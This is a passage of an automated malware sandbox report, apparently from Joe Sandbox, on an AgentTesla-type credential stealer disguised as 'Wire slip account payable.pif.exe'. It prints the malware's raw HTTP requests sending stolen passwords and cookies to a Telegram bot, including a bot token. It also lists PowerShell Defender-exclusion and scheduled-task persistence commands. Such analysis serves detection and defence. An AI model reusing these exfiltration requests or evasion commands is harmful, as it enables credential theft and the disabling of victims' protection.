                                                                                                                  2024-11-21 10:02:11 UTC915OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 65 39 61 36 33 34 61 66 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 36 38 33 31 31 31 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 65 39 61 36 33 34 61 66 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 35 3a 30 32 3a 30 37 0a 55 73 65 72
                                                                                                                  Data Ascii: -----------------------------8dd09e9a634aff9Content-Disposition: form-data; name="chat_id"5968311109-----------------------------8dd09e9a634aff9Content-Disposition: form-data; name="caption"New PW Recovered!Time: 11/21/2024 05:02:07User
                                                                                                                  2024-11-21 10:02:11 UTC25INHTTP/1.1 100 Continue
                                                                                                                  2024-11-21 10:02:11 UTC1022INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Thu, 21 Nov 2024 10:02:11 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 634
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":1190,"from":{"id":7180778750,"is_bot":true,"first_name":"Newman$","username":"Newman101_bot"},"chat":{"id":5968311109,"first_name":"New","last_name":"Man","type":"private"},"date":1732183331,"document":{"file_name":"user-226546 2024-11-21 05-02-07.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIEpmc_BSMJiwKyCPbEToCjASXmqWy5AAIcFgACPvP4UeWrz1MmDW7UNgQ","file_unique_id":"AgADHBYAAj7z-FE","file_size":319},"caption":"New PW Recovered!\n\nTime: 11/21/2024 05:02:07\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449740149.154.167.2204437432C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-21 10:02:13 UTC237OUTPOST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dd0a0b1ada11a6
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 3951
                                                                                                                  Expect: 100-continue
                                                                                                                  2024-11-21 10:02:13 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 62 31 61 64 61 31 31 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 36 38 33 31 31 31 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 62 31 61 64 61 31 31 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 39 3a 30 31 3a 33 36 0a 55 73 65 72
                                                                                                                  Data Ascii: -----------------------------8dd0a0b1ada11a6Content-Disposition: form-data; name="chat_id"5968311109-----------------------------8dd0a0b1ada11a6Content-Disposition: form-data; name="caption"New CO Recovered!Time: 11/21/2024 09:01:36User
                                                                                                                  2024-11-21 10:02:13 UTC2877OUTData Raw: 6f 69 64 63 09 46 41 4c 53 45 09 31 33 33 34 30 38 38 37 37 33 35 33 35 39 33 33 34 09 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 43 66 44 4a 38 4b 69 75 79 5f 42 35 4a 67 46 4d 6f 37 50 65 50 39 35 4e 4c 68 71 77 63 4a 38 6b 6f 44 79 35 70 58 6b 66 6f 57 73 62 35 53 62 62 55 32 68 56 43 62 73 48 32 71 74 39 47 46 5f 4f 56 43 71 46 6b 4c 45 77 68 76 7a 65 41 44 4e 51 4f 46 35 52 53 6d 6b 44 66 68 35 52 71 66 71 6c 4f 6b 78 35 51 57 6f 34 4c 6c 74 76 77 62 30 43 76 77 42 46 44 38 75 6a 6c 6d 33 42 41 67 6c 4f 65 47 63 61 33 5a 61 74 6b 4c 4d 55 6b 48 42 36 61 6c 61 68 55 72 38 71 4a 37 47 5f 33 41 65 6a 74 6f 6f 79 6d 54 57 43 7a 79 4f 38 39 68 73 68 4a 65 58 38 47 68 37 38 6b 6f 68 62 49 77 30 49 51 59
                                                                                                                  Data Ascii: oidcFALSE13340887735359334.AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY
                                                                                                                  2024-11-21 10:02:13 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 62 31 61 64 61 31 31 61 36 2d 2d 0d 0a
                                                                                                                  Data Ascii: -----------------------------8dd0a0b1ada11a6--
                                                                                                                  2024-11-21 10:02:13 UTC25INHTTP/1.1 100 Continue
                                                                                                                  2024-11-21 10:02:14 UTC1023INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Thu, 21 Nov 2024 10:02:14 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 635
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":1191,"from":{"id":7180778750,"is_bot":true,"first_name":"Newman$","username":"Newman101_bot"},"chat":{"id":5968311109,"first_name":"New","last_name":"Man","type":"private"},"date":1732183334,"document":{"file_name":"user-226546 2024-11-21 09-01-36.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIEp2c_BSa0xYhJvr8D7PYF5JTBVUf8AAIdFgACPvP4UUodGiY7Ko2DNgQ","file_unique_id":"AgADHRYAAj7z-FE","file_size":3355},"caption":"New CO Recovered!\n\nTime: 11/21/2024 09:01:36\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449741149.154.167.2204437856C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-21 10:02:14 UTC260OUTPOST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a859de79
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 915
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-11-21 10:02:14 UTC915OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 65 39 61 38 35 39 64 65 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 36 38 33 31 31 31 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 65 39 61 38 35 39 64 65 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 35 3a 30 32 3a 31 31 0a 55 73 65 72
                                                                                                                  Data Ascii: -----------------------------8dd09e9a859de79Content-Disposition: form-data; name="chat_id"5968311109-----------------------------8dd09e9a859de79Content-Disposition: form-data; name="caption"New PW Recovered!Time: 11/21/2024 05:02:11User
                                                                                                                  2024-11-21 10:02:14 UTC25INHTTP/1.1 100 Continue
                                                                                                                  2024-11-21 10:02:14 UTC1022INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Thu, 21 Nov 2024 10:02:14 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 634
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":1192,"from":{"id":7180778750,"is_bot":true,"first_name":"Newman$","username":"Newman101_bot"},"chat":{"id":5968311109,"first_name":"New","last_name":"Man","type":"private"},"date":1732183334,"document":{"file_name":"user-226546 2024-11-21 05-02-11.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIEqGc_BSbmh1bD7bc4Di1i4PPzG4d2AAIeFgACPvP4UUh_m4I-xcqHNgQ","file_unique_id":"AgADHhYAAj7z-FE","file_size":319},"caption":"New PW Recovered!\n\nTime: 11/21/2024 05:02:11\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.449742149.154.167.2204437856C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-21 10:02:16 UTC237OUTPOST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dd0a042708aced
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 3951
                                                                                                                  Expect: 100-continue
                                                                                                                  2024-11-21 10:02:16 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 34 32 37 30 38 61 63 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 36 38 33 31 31 31 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 34 32 37 30 38 61 63 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 38 3a 31 31 3a 35 30 0a 55 73 65 72
                                                                                                                  Data Ascii: -----------------------------8dd0a042708acedContent-Disposition: form-data; name="chat_id"5968311109-----------------------------8dd0a042708acedContent-Disposition: form-data; name="caption"New CO Recovered!Time: 11/21/2024 08:11:50User
                                                                                                                  2024-11-21 10:02:16 UTC2877OUTData Raw: 6f 69 64 63 09 46 41 4c 53 45 09 31 33 33 34 30 38 38 37 37 33 35 33 35 39 33 33 34 09 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 43 66 44 4a 38 4b 69 75 79 5f 42 35 4a 67 46 4d 6f 37 50 65 50 39 35 4e 4c 68 71 77 63 4a 38 6b 6f 44 79 35 70 58 6b 66 6f 57 73 62 35 53 62 62 55 32 68 56 43 62 73 48 32 71 74 39 47 46 5f 4f 56 43 71 46 6b 4c 45 77 68 76 7a 65 41 44 4e 51 4f 46 35 52 53 6d 6b 44 66 68 35 52 71 66 71 6c 4f 6b 78 35 51 57 6f 34 4c 6c 74 76 77 62 30 43 76 77 42 46 44 38 75 6a 6c 6d 33 42 41 67 6c 4f 65 47 63 61 33 5a 61 74 6b 4c 4d 55 6b 48 42 36 61 6c 61 68 55 72 38 71 4a 37 47 5f 33 41 65 6a 74 6f 6f 79 6d 54 57 43 7a 79 4f 38 39 68 73 68 4a 65 58 38 47 68 37 38 6b 6f 68 62 49 77 30 49 51 59
                                                                                                                  Data Ascii: oidcFALSE13340887735359334.AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY
                                                                                                                  2024-11-21 10:02:16 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 61 30 34 32 37 30 38 61 63 65 64 2d 2d 0d 0a
                                                                                                                  Data Ascii: -----------------------------8dd0a042708aced--
                                                                                                                  2024-11-21 10:02:17 UTC25INHTTP/1.1 100 Continue
                                                                                                                  2024-11-21 10:02:17 UTC1023INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Thu, 21 Nov 2024 10:02:17 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 635
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":1193,"from":{"id":7180778750,"is_bot":true,"first_name":"Newman$","username":"Newman101_bot"},"chat":{"id":5968311109,"first_name":"New","last_name":"Man","type":"private"},"date":1732183337,"document":{"file_name":"user-226546 2024-11-21 08-11-50.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIEqWc_BSmpzrwyOw_hmaBSrjDbI20XAAIfFgACPvP4UchXU_UE9193NgQ","file_unique_id":"AgADHxYAAj7z-FE","file_size":3355},"caption":"New CO Recovered!\n\nTime: 11/21/2024 08:11:50\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:05:02:01
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\Wire slip account payable.pif.exe"
                                                                                                                  Imagebase:0x9c0000
                                                                                                                  File size:776'200 bytes
                                                                                                                  MD5 hash:F3C67CD1BBB9C8A8BCB56EE97C5A7B27
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:05:02:03
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
                                                                                                                  Imagebase:0xa60000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:05:02:03
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:05:02:03
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"
                                                                                                                  Imagebase:0xa60000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:05:02:03
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:05:02:03
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"
                                                                                                                  Imagebase:0xa60000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:7
                                                                                                                  Start time:05:02:04
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:8
                                                                                                                  Start time:05:02:04
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\Wire slip account payable.pif.exe"
                                                                                                                  Imagebase:0x900000
                                                                                                                  File size:776'200 bytes
                                                                                                                  MD5 hash:F3C67CD1BBB9C8A8BCB56EE97C5A7B27
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4160419994.0000000002C67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:9
                                                                                                                  Start time:05:02:05
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:776'200 bytes
                                                                                                                  MD5 hash:F3C67CD1BBB9C8A8BCB56EE97C5A7B27
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 63%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:05:02:07
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                  File size:496'640 bytes
                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:11
                                                                                                                  Start time:05:02:08
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp"
                                                                                                                  Imagebase:0xa60000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:05:02:08
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:05:02:08
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\EQVRGq.exe"
                                                                                                                  Imagebase:0x1a0000
                                                                                                                  File size:776'200 bytes
                                                                                                                  MD5 hash:F3C67CD1BBB9C8A8BCB56EE97C5A7B27
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:05:02:08
                                                                                                                  Start date:21/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\EQVRGq.exe"
                                                                                                                  Imagebase:0xc10000
                                                                                                                  File size:776'200 bytes
                                                                                                                  MD5 hash:F3C67CD1BBB9C8A8BCB56EE97C5A7B27
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4160006353.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4160006353.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
